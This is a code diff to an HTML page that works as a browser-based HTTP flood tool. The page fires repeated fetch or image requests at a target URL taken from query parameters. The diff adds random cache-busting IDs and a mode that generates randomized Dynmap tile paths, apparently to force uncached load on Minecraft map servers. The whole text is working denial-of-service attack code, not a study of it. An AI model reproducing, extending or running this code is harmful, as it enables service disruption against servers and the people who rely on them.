--- a/L7.html
+++ b/L7.html
@@ -9,11 +9,23 @@
 
 <body>
     <script>
+        function makeid(length) {
+            let result = '';
+            let characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+            const charactersLength = characters.length;
+            let counter = 0;
+            while (counter < length) {
+                result += characters.charAt(Math.floor(Math.random() * charactersLength));
+                counter += 1;
+            }
+            return result;
+        }
         let params = new URLSearchParams(window.location.search);
         let target = params.get("target");
         let method = params.get("method") || "GET";
         let delay = Number(params.get("delay") || 0);
         let useImg = Boolean(params.get("useImg"));
+        let dynmap = Boolean(params.get("dynmap"));
         if (!target) {
             location.href = "https://example.com"
         } else {
@@ -21,11 +33,15 @@
                 if (useImg) {
                     if (method == "GET") {
                         let img = new Image();
-                        img.src = target + "?" + Math.random().toString();
+                        img.src = target + "?" + makeid(8);
                     }
                 } else {
                     for (let i = 0; i < 100; i++) {
-                        fetch(target + "?" + Math.random().toString(), {
+                        let targetURL = target + "?" + makeid(8);
+                        if (dynmap) {
+                            targetURL = `${target}/tiles/world/flat/${Math.floor(Math.random() * 10)}_${Math.floor(Math.random() * 10)}/zzzzz_${Math.floor(Math.random() * 128)}_${Math.floor(Math.random() * 128)}.jpg?timestamp=${Math.floor(Math.random() * 100000000)}`
+                        }
+                        fetch(targetURL, {
                             method
                         }).catch(() => { });
                     }
